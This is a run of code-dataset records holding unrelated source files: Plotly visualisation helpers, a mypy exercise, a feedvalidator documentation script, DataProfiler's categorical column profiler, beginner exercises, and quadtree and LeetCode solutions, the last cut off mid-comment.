step[\"args\"][0][\"visible\"][vis_name2id[f'o_final']] = True\n else:\n step[\"args\"][0][\"visible\"][vis_name2id[f'o_next_{i}']] = True\n steps.append(step)\n\n sliders = [dict(\n active=0, \n pad={\"t\": 50},\n steps=steps\n )]\n fig.update_layout(sliders=sliders)\n return fig\n \n def get_plotly_with_slidebar_v2(self):\n vis_name2id = {}\n for i in range(len(self.vis)):\n vis_name2id[self.vis[i].name] = i\n \n traces = {}\n for i in range(self.step_count):\n traces[i] = []\n traces[i].append(self.vis[vis_name2id[f'background']])\n if f'goal' in vis_name2id.keys():\n traces[i].append(self.vis[vis_name2id['goal']])\n if f'g_{i}' in vis_name2id.keys():\n traces[i].append(self.vis[vis_name2id[f'g_{i}']])\n traces[i].append(self.vis[vis_name2id[f'o_{i}']])\n traces[i].append(self.vis[vis_name2id[f'a_{i}']])\n \n if i == self.step_count - 1:\n traces[i].append(self.vis[vis_name2id[f'o_final']])\n else:\n traces[i].append(self.vis[vis_name2id[f'o_next_{i}']])\n \n # Final step\n i = self.step_count \n traces[i] = []\n traces[i].append(self.vis[vis_name2id[f'background']])\n if f'goal' in vis_name2id.keys():\n traces[i].append(self.vis[vis_name2id['goal']])\n if f'g_{i-1}' in vis_name2id.keys():\n traces[i].append(self.vis[vis_name2id[f'g_{i-1}']])\n traces[i].append(self.vis[vis_name2id[f'o_final']])\n traces[i].append(self.vis[vis_name2id[f'a_{i-1}']])\n \n fig = go.Figure(\n data=traces[0],\n frames=[\n go.Frame(data=traces[k], name=str(k))\n for k in range(self.step_count+1)\n ]\n )\n fig.frames[-1].data[-1].visible = False\n # Every frame needs to have the same number of traces\n \n # Layout\n fig.update_layout(\n title=self.title,\n width=600,\n height=600,\n scene1=dict(aspectmode='data'),\n updatemenus=[\n {\n \"buttons\": [\n {\n \"args\": [None, self.frame_args(500)],\n \"label\": \"▶\", # play symbol\n \"method\": \"animate\",\n },\n {\n \"args\": [[None], self.frame_args(0)],\n \"label\": \"◼\", # pause symbol\n \"method\": \"animate\",\n },\n ],\n \"direction\": \"left\",\n \"pad\": {\"r\": 10, \"t\": 70},\n \"type\": \"buttons\",\n \"x\": 0.1,\n \"y\": 0,\n }\n ],\n sliders= [\n {\n \"pad\": {\"b\": 10, \"t\": 60},\n \"len\": 0.9,\n \"x\": 0.1,\n \"y\": 0,\n # \"steps\": steps,\n \"steps\": [\n {\n \"args\": [[f.name], self.frame_args(0)],\n \"label\": f'step {str(k)}',\n \"method\": \"animate\",\n }\n for k, f in enumerate(fig.frames)\n ],\n }\n ],\n )\n \n return fig\n \n def frame_args(self, duration):\n return {\n \"frame\": {\"duration\": duration},\n \"mode\": \"immediate\",\n \"fromcurrent\": True,\n \"transition\": {\"duration\": duration, \"easing\": \"linear\"},\n }\n \n\n def close(self) -> None:\n self.close_video_recorder()\n\n # def __del__(self):\n # self.close()\n","repo_name":"HACMan-2023/HACMan","sub_path":"hacman/envs/wandb_wrappers.py","file_name":"wandb_wrappers.py","file_ext":"py","file_size_in_byte":15560,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"21"} +{"seq_id":"3466926196","text":"def cabe(texto: str, alinhamento: bool = True) -> str: # O 'mypy' Só Funciona com estas sintaxes.\n if alinhamento:\n return f\"{texto.title()}\\n{'-'* len(texto)}\"\n else:\n return f\"{texto.title()}\".center(50, '#')\n\nprint(cabe(\"Gow Dikson\"))\n\nprint(cabe(\"Gow Santos\", alinhamento=False))\n#O Comando mypy NomeDoArquivo.py Apontou um erro na linha 11 quando usei uma String ao invés de True:\nprint(cabe(\"Dikson Santos\", alinhamento=True))#160_Tipos_De_Dados_Com_MyPy.py:11: error: Argument \"alinhamento\" ...\n\n# 
CTRL / -> Comments out all the selected lines.\n\n","repo_name":"DiksonSantos/GeekUniversity_Python","sub_path":"160_Tipos_De_Dados_Com_MyPy.py","file_name":"160_Tipos_De_Dados_Com_MyPy.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29626479395","text":"import sys\nfrom os.path import isfile\nimport os.path as path\nbasename = path.dirname(path.dirname(path.abspath(__file__)))\nsys.path.append(path.join(basename,'src'))\n\nfrom feedvalidator.i18n.en import messages\nfrom feedvalidator.logging import Warning, Error\nimport feedvalidator\n\nignoreMissing = [\"warning/RSS20Profile\", \"error/ValidationFailure\"]\n\ntemplate = '''\n\n
\n\n%s\n\n\nXXX\n\n\nXXX\n\n
\n'''\n\nimport inspect\n# Logic from text_html.py\ndef getRootClass(aClass):\n bl = aClass.__bases__\n if not(bl):\n return None\n\n aClass = bl[0]\n bl = bl[0].__bases__\n\n while bl:\n base = bl[0]\n if base == feedvalidator.logging.Message:\n return aClass\n aClass = base\n bl = aClass.__bases__\n return None\n\ndef isclass(x):\n import types\n return inspect.isclass(x) or type(x) == type\n\ndef missing():\n result = []\n\n for n, o in inspect.getmembers(feedvalidator.logging, isclass):\n rc = getRootClass(o)\n if not(rc):\n continue\n\n rcname = rc.__name__.split('.')[-1].lower()\n if rcname in ['warning', 'error']:\n fn = path.join(basename, 'docs', rcname, n + '.html')\n if not(isfile(path.join(basename, fn))) and not rcname + \"/\" + n in ignoreMissing:\n result.append((rcname, n, \"\", fn, fn))\n\n\n for key, value in list(messages.items()):\n if issubclass(key,Error):\n dir = 'error'\n elif issubclass(key,Warning):\n dir = 'warning'\n else:\n continue\n\n html = path.join(basename, 'docs', dir, key.__name__+'.html')\n xml = path.join(basename, 'docs-xml', dir, key.__name__+'.xml')\n\n if not path.exists(xml) or not path.exists(html):\n result.append((dir, key.__name__, value, html, xml))\n\n return result\n\nimport unittest\nclass MissingMessagesTest(unittest.TestCase):\n def test_messages(self):\n self.assertEqual([],\n [\"%s/%s\" % (dir,id) for dir, id, msg, xml, html in missing()], \"Errors/warnings without corresponding documentation\")\n\ndef buildTestSuite():\n suite = unittest.TestSuite()\n loader = unittest.TestLoader()\n suite.addTest(loader.loadTestsFromTestCase(MissingMessagesTest))\n return suite\n\nif __name__ == '__main__':\n import re\n for dir, id, msg, html, xml in missing():\n msg = re.sub(\"%\\(\\w+\\)\\w?\", \"foo\", msg)\n if not path.exists(html):\n pass\n if not path.exists(xml):\n open(xml,'w').write(template.lstrip() % msg)\n print(xml)\n","repo_name":"w3c/feedvalidator","sub_path":"docs-xml/mkmsgs.py","file_name":"mkmsgs.py","file_ext":"py","file_size_in_byte":2529,"program_lang":"python","lang":"en","doc_type":"code","stars":65,"dataset":"github-code","pt":"21"} +{"seq_id":"22568403601","text":"\"\"\"Contains class for categorical column profiler.\"\"\"\nfrom __future__ import annotations\n\nimport math\nfrom collections import defaultdict\nfrom operator import itemgetter\nfrom typing import cast\n\nimport datasketches\nfrom pandas import DataFrame, Series\n\nfrom .. import dp_logging\nfrom . 
import profiler_utils\nfrom .base_column_profilers import BaseColumnProfiler\nfrom .profiler_options import CategoricalOptions\n\nlogger = dp_logging.get_child_logger(__name__)\n\n\nclass CategoricalColumn(BaseColumnProfiler[\"CategoricalColumn\"]):\n \"\"\"\n Categorical column profile subclass of BaseColumnProfiler.\n\n Represents a column int the dataset which is a categorical column.\n \"\"\"\n\n type = \"category\"\n\n # If total number of unique values in a column is less than this value,\n # that column is classified as a categorical column.\n _MAXIMUM_UNIQUE_VALUES_TO_CLASSIFY_AS_CATEGORICAL = 10\n\n # Default value that determines if a given col is categorical or not.\n _CATEGORICAL_THRESHOLD_DEFAULT = 0.2\n\n def __init__(self, name: str | None, options: CategoricalOptions = None) -> None:\n \"\"\"\n Initialize column base properties and itself.\n\n :param name: Name of data\n :type name: String\n \"\"\"\n if options and not isinstance(options, CategoricalOptions):\n raise ValueError(\n \"CategoricalColumn parameter 'options' must be of\"\n \" type CategoricalOptions.\"\n )\n super().__init__(name)\n self._categories: dict[str, int] = defaultdict(int)\n self.__calculations: dict = {}\n self._filter_properties_w_options(self.__calculations, options)\n self._top_k_categories: int | None = None\n\n # Conditions to stop categorical profiling\n self.max_sample_size_to_check_stop_condition = None\n self.stop_condition_unique_value_ratio = None\n self._stop_condition_is_met = False\n\n self._stopped_at_unique_ratio: float | None = None\n self._stopped_at_unique_count: int | None = None\n\n self._cms_max_num_heavy_hitters: int | None = 5000\n self.cms_num_hashes: int | None = None\n self.cms_num_buckets: int | None = None\n self.cms: datasketches.countminsketch | None = None\n if options:\n self._top_k_categories = options.top_k_categories\n self.stop_condition_unique_value_ratio = (\n options.stop_condition_unique_value_ratio\n )\n self.max_sample_size_to_check_stop_condition = (\n options.max_sample_size_to_check_stop_condition\n )\n\n if options.cms:\n self._cms_max_num_heavy_hitters = options.cms_max_num_heavy_hitters\n self.cms_num_hashes = datasketches.count_min_sketch.suggest_num_hashes(\n options.cms_confidence\n )\n self.cms_num_buckets = (\n datasketches.count_min_sketch.suggest_num_buckets(\n options.cms_relative_error\n )\n )\n self.cms = datasketches.count_min_sketch(\n self.cms_num_hashes, self.cms_num_buckets\n )\n\n def __add__(self, other: CategoricalColumn) -> CategoricalColumn:\n \"\"\"\n Merge the properties of two CategoricalColumn profiles.\n\n :param self: first profile\n :param other: second profile\n :type self: CategoricalColumn\n :type other: CategoricalColumn\n :return: New CategoricalColumn merged profile\n \"\"\"\n if not isinstance(other, CategoricalColumn):\n raise TypeError(\n \"Unsupported operand type(s) for +: \"\n \"'CategoricalColumn' and '{}'\".format(other.__class__.__name__)\n )\n\n merged_profile = CategoricalColumn(None)\n BaseColumnProfiler._add_helper(merged_profile, self, other)\n\n self._merge_calculations(\n merged_profile.__calculations, self.__calculations, other.__calculations\n )\n\n if self.cms and other.cms:\n\n assert isinstance(self._cms_max_num_heavy_hitters, int)\n assert isinstance(other._cms_max_num_heavy_hitters, int)\n cms_max_num_heavy_hitters: int = min(\n self._cms_max_num_heavy_hitters, other._cms_max_num_heavy_hitters\n )\n\n (\n merged_profile.cms,\n merged_profile._categories,\n 
merged_profile._cms_max_num_heavy_hitters,\n ) = self._merge_categories_cms(\n self.cms,\n self._categories,\n self.sample_size,\n {},\n other.cms,\n other._categories,\n other.sample_size,\n cms_max_num_heavy_hitters,\n )\n\n elif not self.cms and not other.cms:\n # If both profiles have not met stop condition\n if not (self._stop_condition_is_met or other._stop_condition_is_met):\n merged_profile._categories = profiler_utils.add_nested_dictionaries(\n self._categories, other._categories\n )\n\n # Transfer stop condition variables of 1st profile object to\n # merged profile if they are not None else set to 2nd profile\n profile1_product = self.sample_size * self.unique_ratio\n profile2_product = other.sample_size * other.unique_ratio\n if profile1_product < profile2_product:\n merged_profile.max_sample_size_to_check_stop_condition = (\n self.max_sample_size_to_check_stop_condition\n )\n merged_profile.stop_condition_unique_value_ratio = (\n self.stop_condition_unique_value_ratio\n )\n else:\n merged_profile.stop_condition_unique_value_ratio = (\n other.stop_condition_unique_value_ratio\n )\n merged_profile.max_sample_size_to_check_stop_condition = (\n other.max_sample_size_to_check_stop_condition\n )\n\n # Check merged profile w/ stop condition\n if merged_profile._check_stop_condition_is_met(\n merged_profile.sample_size, merged_profile.unique_ratio\n ):\n merged_profile._stopped_at_unique_ratio = (\n merged_profile.unique_ratio\n )\n merged_profile._stopped_at_unique_count = (\n merged_profile.unique_count\n )\n merged_profile._categories = {}\n merged_profile._stop_condition_is_met = True\n\n else:\n if self.sample_size > other.sample_size:\n merged_profile._stopped_at_unique_ratio = self.unique_ratio\n merged_profile._stopped_at_unique_count = self.unique_count\n merged_profile.sample_size = self.sample_size\n else:\n merged_profile._stopped_at_unique_ratio = other.unique_ratio\n merged_profile._stopped_at_unique_count = other.unique_count\n merged_profile.sample_size = other.sample_size\n\n # If either profile has hit stop condition, remove categories dict\n merged_profile._categories = {}\n merged_profile._stop_condition_is_met = True\n\n else:\n raise Exception(\n \"Unable to add two profiles: One is using count min sketch\"\n \"and the other is using full.\"\n )\n\n return merged_profile\n\n @property\n def gini_impurity(self) -> float | None:\n \"\"\"\n Return Gini Impurity.\n\n Gini Impurity is a way to calculate\n likelihood of an incorrect classification of a new instance of\n a random variable.\n\n G = Σ(i=1; J): P(i) * (1 - P(i)), where i is the category classes.\n We are traversing through categories and calculating with the column\n\n :return: None or Gini Impurity probability\n \"\"\"\n if self.sample_size == 0:\n return None\n gini_sum: float = 0\n for i in self._categories:\n gini_sum += (self._categories[i] / self.sample_size) * (\n 1 - (self._categories[i] / self.sample_size)\n )\n return gini_sum\n\n @property\n def unalikeability(self) -> float | None:\n \"\"\"\n Return Unlikeability.\n\n Unikeability checks for \"how often observations differ from one another\"\n Reference: Perry, M. and Kader, G. Variation as Unalikeability.\n Teaching Statistics, Vol. 27, No. 2 (2005), pp. 
58-60.\n\n U = Σ(i=1,n)Σ(j=1,n): (Cij)/(n**2-n)\n Cij = 1 if i!=j, 0 if i=j\n\n :return: None or unlikeability probability\n \"\"\"\n if self.sample_size == 0:\n return None\n elif self.sample_size == 1:\n return 0\n unalike_sum: int = 0\n for category in self._categories:\n unalike_sum += (\n self.sample_size - self._categories[category]\n ) * self._categories[category]\n unalike: float = unalike_sum / (self.sample_size**2 - self.sample_size)\n return unalike\n\n def diff(self, other_profile: CategoricalColumn, options: dict = None) -> dict:\n \"\"\"\n Find the differences for CategoricalColumns.\n\n :param other_profile: profile to find the difference with\n :type other_profile: CategoricalColumn\n :return: the CategoricalColumn differences\n :rtype: dict\n \"\"\"\n # Make sure other_profile's type matches this class\n differences: dict = super().diff(other_profile, options)\n\n differences[\"categorical\"] = profiler_utils.find_diff_of_strings_and_bools(\n self.is_match, other_profile.is_match\n )\n\n differences[\"statistics\"] = dict(\n [\n (\n \"unique_count\",\n profiler_utils.find_diff_of_numbers(\n self.unique_count, other_profile.unique_count\n ),\n ),\n (\n \"unique_ratio\",\n profiler_utils.find_diff_of_numbers(\n self.unique_ratio, other_profile.unique_ratio\n ),\n ),\n ]\n )\n\n # These stats are only diffed if both profiles are categorical\n if self.is_match and other_profile.is_match:\n differences[\"statistics\"][\n \"chi2-test\"\n ] = profiler_utils.perform_chi_squared_test_for_homogeneity(\n self._categories,\n self.sample_size,\n other_profile._categories,\n other_profile.sample_size,\n )\n differences[\"statistics\"][\n \"categories\"\n ] = profiler_utils.find_diff_of_lists_and_sets(\n self.categories, other_profile.categories\n )\n differences[\"statistics\"][\n \"gini_impurity\"\n ] = profiler_utils.find_diff_of_numbers(\n self.gini_impurity, other_profile.gini_impurity\n )\n differences[\"statistics\"][\n \"unalikeability\"\n ] = profiler_utils.find_diff_of_numbers(\n self.unalikeability, other_profile.unalikeability\n )\n cat_count1 = dict(\n sorted(self._categories.items(), key=itemgetter(1), reverse=True)\n )\n cat_count2 = dict(\n sorted(\n other_profile._categories.items(), key=itemgetter(1), reverse=True\n )\n )\n (\n self_cat_count,\n other_cat_count,\n ) = self._preprocess_for_categorical_psi_calculation(\n self_cat_count=cat_count1,\n other_cat_count=cat_count2,\n )\n\n total_psi = 0.0\n for iter_key in self_cat_count.keys():\n percent_self = self_cat_count[iter_key] / self.sample_size\n percent_other = other_cat_count[iter_key] / other_profile.sample_size\n if (percent_other != 0) and (percent_self != 0):\n total_psi += (percent_other - percent_self) * math.log(\n percent_other / percent_self\n )\n differences[\"statistics\"][\"psi\"] = total_psi\n\n differences[\"statistics\"][\n \"categorical_count\"\n ] = profiler_utils.find_diff_of_dicts(self_cat_count, other_cat_count)\n\n return differences\n\n def report(self, remove_disabled_flag: bool = False) -> dict:\n \"\"\"\n Return report.\n\n This is a private abstract method.\n\n :param remove_disabled_flag: flag to determine if disabled\n options should be excluded in the report.\n :type remove_disabled_flag: boolean\n \"\"\"\n return self.profile\n\n @classmethod\n def load_from_dict(cls, data: dict, config: dict | None = None):\n \"\"\"\n Parse attribute from json dictionary into self.\n\n :param data: dictionary with attributes and values.\n :type data: dict[string, Any]\n :param config: config for 
loading column profiler params from dictionary\n :type config: Dict | None\n\n :return: Profiler with attributes populated.\n :rtype: CategoricalColumn\n \"\"\"\n value = data.pop(\"_categories\")\n profile = super().load_from_dict(data)\n setattr(profile, \"_categories\", defaultdict(int, value))\n return profile\n\n @property\n def profile(self) -> dict:\n \"\"\"\n Return the profile of the column.\n\n For categorical_count, it will display the top k categories most\n frequently occurred in descending order.\n \"\"\"\n profile: dict = dict(\n categorical=self.is_match,\n statistics=dict(\n [\n (\"unique_count\", self.unique_count),\n (\"unique_ratio\", self.unique_ratio),\n ]\n ),\n times=self.times,\n )\n if self.is_match:\n profile[\"statistics\"][\"categories\"] = self.categories\n profile[\"statistics\"][\"gini_impurity\"] = self.gini_impurity\n profile[\"statistics\"][\"unalikeability\"] = self.unalikeability\n profile[\"statistics\"][\"categorical_count\"] = dict(\n sorted(self._categories.items(), key=itemgetter(1), reverse=True)[\n : self._top_k_categories\n ]\n )\n return profile\n\n @property\n def categories(self) -> list[str]:\n \"\"\"Return categories.\"\"\"\n return list(self._categories.keys())\n\n @property\n def categorical_counts(self) -> dict[str, int]:\n \"\"\"Return counts of each category.\"\"\"\n return self._categories.copy()\n\n @property\n def unique_ratio(self) -> float:\n \"\"\"Return ratio of unique categories to sample_size.\"\"\"\n if self._stop_condition_is_met:\n return cast(float, self._stopped_at_unique_ratio)\n\n if self.sample_size:\n return len(self.categories) / self.sample_size\n return 0\n\n @property\n def unique_count(self) -> int:\n \"\"\"Return ratio of unique categories to sample_size.\"\"\"\n if self._stop_condition_is_met:\n return cast(int, self._stopped_at_unique_count)\n\n return len(self.categories)\n\n @property\n def is_match(self) -> bool:\n \"\"\"Return true if column is categorical.\"\"\"\n if self._stop_condition_is_met:\n return False\n\n is_match = False\n unique = len(self._categories)\n if unique <= self._MAXIMUM_UNIQUE_VALUES_TO_CLASSIFY_AS_CATEGORICAL:\n is_match = True\n elif (\n self.sample_size\n and self.unique_ratio <= self._CATEGORICAL_THRESHOLD_DEFAULT\n ):\n is_match = True\n return is_match\n\n def _preprocess_for_categorical_psi_calculation(\n self, self_cat_count, other_cat_count\n ):\n super_set_categories = set(self_cat_count.keys()) | set(other_cat_count.keys())\n if self_cat_count.keys() != other_cat_count.keys():\n logger.info(\n f\"\"\"PSI data pre-processing found that categories between\n the profiles were not equal. 
Categories missing from one profile are treated as zero counts;\n                the union of categories considered is {super_set_categories}.\"\"\"\n            )\n\n        for iter_key in super_set_categories:\n            for iter_dictionary in [self_cat_count, other_cat_count]:\n                iter_dictionary.setdefault(iter_key, 0)\n        return self_cat_count, other_cat_count\n\n    def _check_stop_condition_is_met(self, sample_size: int, unique_ratio: float):\n        \"\"\"Return True if the stop conditions are met.\n\n        :param sample_size: Number of samples to check the stop condition\n        :type sample_size: int\n        :param unique_ratio: Ratio of unique values to full sample size to\n            check stop condition\n        :type unique_ratio: float\n        :return: boolean for stop conditions\n        \"\"\"\n        if (\n            self.max_sample_size_to_check_stop_condition is not None\n            and self.stop_condition_unique_value_ratio is not None\n            and sample_size >= self.max_sample_size_to_check_stop_condition\n            and unique_ratio >= self.stop_condition_unique_value_ratio\n        ):\n            return True\n        return False\n\n    def _update_stop_condition(self, data: DataFrame):\n        \"\"\"Update the stop-condition state given the incoming data.\n\n        :param data: Dataframe currently being processed by categorical profiler\n        :type data: DataFrame\n        :return: None; sets self._stop_condition_is_met in place\n        \"\"\"\n        merged_unique_count = len(self._categories)\n        merged_sample_size = self.sample_size + len(data)\n        merged_unique_ratio = merged_unique_count / merged_sample_size\n\n        self._stop_condition_is_met = self._check_stop_condition_is_met(\n            merged_sample_size, merged_unique_ratio\n        )\n        if self._stop_condition_is_met:\n            self._stopped_at_unique_ratio = merged_unique_ratio\n            self._stopped_at_unique_count = merged_unique_count\n\n    @BaseColumnProfiler._timeit(name=\"categories\")\n    def _get_categories_cms(self, df_series, len_df):\n        \"\"\"Return count min sketch and heavy hitters for both the batch and stream case.\n\n        :param df_series: Series currently being processed by categorical profiler\n        :type df_series: Series\n        :param len_df: the total number of samples in df_series\n        :type len_df: int\n        :return: cms, heavy_hitter_dict, missing_heavy_hitter_dict\n        \"\"\"\n        cms = datasketches.count_min_sketch(self.cms_num_hashes, self.cms_num_buckets)\n        heavy_hitter_dict = defaultdict(int)\n        missing_heavy_hitter_dict = defaultdict(int)\n        for i, value in enumerate(df_series):\n            cms.update(value)\n            i_count = cms.get_estimate(value)\n            i_total_count = i_count + self.cms.get_estimate(value)\n            # approximate heavy-hitters\n            if i_count >= int(len_df / self._cms_max_num_heavy_hitters):\n                heavy_hitter_dict[value] = i_count\n                missing_heavy_hitter_dict.pop(value, None)\n            elif i_total_count >= int(\n                (self.sample_size + len_df) / self._cms_max_num_heavy_hitters\n            ):\n                missing_heavy_hitter_dict[value] = i_total_count\n                heavy_hitter_dict.pop(value, None)\n\n        return cms, heavy_hitter_dict, missing_heavy_hitter_dict\n\n    @BaseColumnProfiler._timeit(name=\"categories\")\n    def _merge_categories_cms(\n        self,\n        cms1,\n        heavy_hitter_dict1,\n        len1,\n        missing_heavy_hitter_dict,\n        cms2,\n        heavy_hitter_dict2,\n        len2,\n        max_num_heavy_hitters,\n    ):\n        \"\"\"Return the aggregate count min sketch and approximate histogram (categories).\n\n        :param cms1: count min sketch\n        :type cms1: datasketches.countminsketch\n        :param cms2: count min sketch\n        :type cms2: datasketches.countminsketch\n        :param heavy_hitter_dict1: Heavy Hitters category count\n        :type heavy_hitter_dict1: Dict\n        :param heavy_hitter_dict2: Heavy Hitters category count\n        :type heavy_hitter_dict2: Dict\n        :param 
missing_heavy_hitter_dict: Heavy Hitters category count\n            considering two batches are two chunks of a data stream\n        :type missing_heavy_hitter_dict: Dict\n        :param len1: number of samples in batch 1\n        :type len1: int\n        :param len2: number of samples in batch 2\n        :type len2: int\n        :param max_num_heavy_hitters: value used to define\n            the threshold for minimum frequency required by a category to be counted\n        :type max_num_heavy_hitters: int\n        :return: cms3, categories, max_num_heavy_hitters\n        \"\"\"\n        try:\n            cms3 = datasketches.count_min_sketch(\n                self.cms_num_hashes, self.cms_num_buckets\n            )\n            cms3.merge(cms1)\n            cms3.merge(cms2)\n        except ValueError as err:\n            raise ValueError(\n                \"\"\"Incompatible sketch configuration. When merging two sketches,\n                they must have the same number of buckets and hashes,\n                which are defined by cms_confidence and cms_relative_error options,\n                respectively.\"\"\"\n            ) from err\n\n        # Re-collect the estimates of non-intersecting categories before\n        # re-applying heavy-hitters to the aggregate profile.\n        heavy_hitter_dict1 = heavy_hitter_dict1.copy()\n        heavy_hitter_dict2 = heavy_hitter_dict2.copy()\n        for k in (x for x in heavy_hitter_dict1 if x not in heavy_hitter_dict2):\n            heavy_hitter_dict2[k] = cms2.get_estimate(k)\n        for k in (x for x in heavy_hitter_dict2 if x not in heavy_hitter_dict1):\n            heavy_hitter_dict1[k] = cms1.get_estimate(k)\n\n        categories = profiler_utils.add_nested_dictionaries(\n            heavy_hitter_dict2, heavy_hitter_dict1\n        )\n\n        # Catch-all for edge cases where per-batch heavy hitters underestimate\n        # frequencies relative to treating the batches as chunks of\n        # the same stream.\n        categories.update(missing_heavy_hitter_dict)\n\n        total_samples = len1 + len2\n        for cat in list(categories):\n            if categories[cat] < (total_samples / max_num_heavy_hitters):\n                categories.pop(cat)\n        return cms3, categories, max_num_heavy_hitters\n\n    def _get_categories_full(self, df_series) -> dict:\n        \"\"\"Get the unique counts (categories) of a series.\n\n        :param df_series: df series with nulls removed\n        :type df_series: pandas.core.series.Series\n        :return: dict of counts for each unique value\n        :rtype: dict\n        \"\"\"\n        category_count: dict = df_series.value_counts(dropna=False).to_dict()\n        return category_count\n\n    @BaseColumnProfiler._timeit(name=\"categories\")\n    def _update_categories(\n        self,\n        df_series: DataFrame,\n        prev_dependent_properties: dict = None,\n        subset_properties: dict = None,\n    ) -> None:\n        \"\"\"\n        Check whether column corresponds to category type.\n\n        Adds category parameters if it is.\n\n        :param prev_dependent_properties: Contains all the previous properties\n            that the calculations depend on.\n        :type prev_dependent_properties: dict\n        :param subset_properties: Contains the results of the properties of the\n            subset before they are merged into the main data profile.\n        :type subset_properties: dict\n        :param df_series: Data to be profiled\n        :type df_series: pandas.DataFrame\n        :return: None\n        \"\"\"\n        if self.cms is not None:\n            if self._cms_max_num_heavy_hitters is None:\n                raise ValueError(\n                    \"when using CMS, cms_max_num_heavy_hitters must be an integer\"\n                )\n            len_df = len(df_series)\n            (\n                cms,\n                heavy_hitter_dict,\n                missing_heavy_hitter_dict,\n            ) = self._get_categories_cms(df_series, len_df)\n\n            self.cms, self._categories, _ = self._merge_categories_cms(\n                cms,\n                heavy_hitter_dict,\n                len_df,\n                missing_heavy_hitter_dict,\n                self.cms,\n                self._categories,\n                self.sample_size,\n                self._cms_max_num_heavy_hitters,\n            )\n        else:\n            category_count = 
self._get_categories_full(df_series)\n self._categories = profiler_utils.add_nested_dictionaries(\n self._categories, category_count\n )\n self._update_stop_condition(df_series)\n if self._stop_condition_is_met:\n self._categories = {}\n\n def _update_helper(self, df_series_clean: Series, profile: dict) -> None:\n \"\"\"\n Update col profile properties with clean dataset and its known profile.\n\n :param df_series_clean: df series with nulls removed\n :type df_series_clean: pandas.core.series.Series\n :param profile: categorical profile dictionary\n :type profile: dict\n :return: None\n \"\"\"\n self._update_column_base_properties(profile)\n\n def update(self, df_series: Series) -> CategoricalColumn:\n \"\"\"\n Update the column profile.\n\n :param df_series: Data to profile.\n :type df_series: pandas.core.series.Series\n :return: updated CategoricalColumn\n :rtype: CategoricalColumn\n \"\"\"\n # If condition for limiting profile calculations\n if len(df_series) == 0 or self._stop_condition_is_met:\n return self\n\n profile = dict(sample_size=len(df_series))\n CategoricalColumn._update_categories(self, df_series)\n BaseColumnProfiler._perform_property_calcs(\n self,\n self.__calculations,\n df_series=df_series,\n prev_dependent_properties={},\n subset_properties=profile,\n )\n\n self._update_helper(df_series, profile)\n\n return self\n","repo_name":"capitalone/DataProfiler","sub_path":"dataprofiler/profilers/categorical_column_profile.py","file_name":"categorical_column_profile.py","file_ext":"py","file_size_in_byte":26742,"program_lang":"python","lang":"en","doc_type":"code","stars":1277,"dataset":"github-code","pt":"21"} +{"seq_id":"4248177430","text":"\r\ncus_current_trans =0\r\ncus_name = input(\"Enter your name :\")\r\ncus_year = input(\"Enter years of Service : \")\r\ncus_current_trans= input(\"Enter your Current Transaction : \")\r\n\r\ncheking = 1000000\r\nnum =int(cheking)\r\n\r\ncus_after_dis_trans = 0\r\nyear= int(cus_year)\r\nconvert = float(cus_current_trans)\r\n\r\n\r\n\r\n\r\nif(year>=10):\r\n if(convert >=num):\r\n cus_after_dis_trans =convert - (float(convert * 0.1))\r\n print(f\"Congratulations {cus_name}, you get 10% discount for transacting over {cus_year} with us. 
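# Illustrative arithmetic for the discount rule above (hypothetical figures,
# not from the original exercise): a customer with 12 years of service and a
# transaction of 1_200_000 passes both checks (year >= 10 and amount >= 1_000_000),
# so the discounted total is 1_200_000 - (1_200_000 * 0.1) = 1_080_000.0.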
the total discount is {cus_after_dis_trans} \")\r\n else:\r\n print(f\"Sorry {cus_name}, you have only been here for {cus_year} don't get a discount this time\")\r\nelse: print(f\"{cus_name}, you are not qualified for any discount because the requirement is 10 years and above \")","repo_name":"dapcigar/Everything-Python","sub_path":"Conditional Statement/nested if.py","file_name":"nested if.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10450876352","text":"# 1992 쿼드트리\n\nimport sys\ninput = sys.stdin.readline\n\ndef sol (startR,startC,length):\n global answer\n check = Tree[startR][startC]\n for i in range(startR,startR+length):\n for j in range(startC,startC+length):\n if check != Tree[i][j]:\n answer += \"(\"\n sol(startR,startC,length//2)\n sol(startR,startC+length//2,length//2)\n sol(startR+length//2,startC,length//2)\n sol(startR+length//2,startC+length//2,length//2)\n answer += \")\"\n return\n if check == \"1\":\n answer += \"1\"\n else:\n answer += \"0\"\n\n\nif __name__ == \"__main__\":\n size = int(input())\n Tree = [[*(input().strip())] for _ in range(size)]\n answer = \"\"\n sol(0,0,size)\n print(answer)\n","repo_name":"inkyu0103/BOJ","sub_path":"Divide & Conqure/1992.py","file_name":"1992.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10076519728","text":"'''\n1304. 和为零的N个唯一整数\n给你一个整数 n,请你返回 任意 一个由 n 个 各不相同 的整数组成的数组,并且这 n 个数相加和为 0 。\n\n\n\n示例 1:\n\n输入:n = 5\n输出:[-7,-1,1,3,4]\n解释:这些数组也是正确的 [-5,-1,1,2,3],[-3,-1,2,-2,4]。\n示例 2:\n\n输入:n = 3\n输出:[-1,0,1]\n示例 3:\n\n输入:n = 1\n输出:[0]\n\n\n提示:\n\n1 <= n <= 1000\n\n1304. Find N Unique Integers Sum up to Zero\nGiven an integer n, return any array containing n unique integers such that they add up to 0.\n\n\n\nExample 1:\n\nInput: n = 5\nOutput: [-7,-1,1,3,4]\nExplanation: These arrays also are accepted [-5,-1,1,2,3] , [-3,-1,2,-2,4].\nExample 2:\n\nInput: n = 3\nOutput: [-1,0,1]\nExample 3:\n\nInput: n = 1\nOutput: [0]\n\n\nConstraints:\n\n1 <= n <= 1000\n'''\n\nclass Solution(object):\n def sumZero(self, n):\n \"\"\"\n :type n: int\n :rtype: List[int]\n \"\"\"\n res = range(-n/2, n/2+1)\n # print(res)\n if n % 2 == 1:\n res.pop(0)\n else:\n res.remove(0)\n return res\n\n# solutions\n\n'''\n方法一:构造\n我们首先将最小的 n - 1 个自然数 0, 1, 2, ..., n - 2 放入数组中,它们的和为 sum。对于剩下的 1 个数,我们可以令其为 -sum,此时这 n 个数的和为 0,并且:\n\n当 n = 1 时,我们构造的答案中只有唯一的 1 个数 0;\n\n当 n > 1 时,我们构造的答案中包含 n - 1 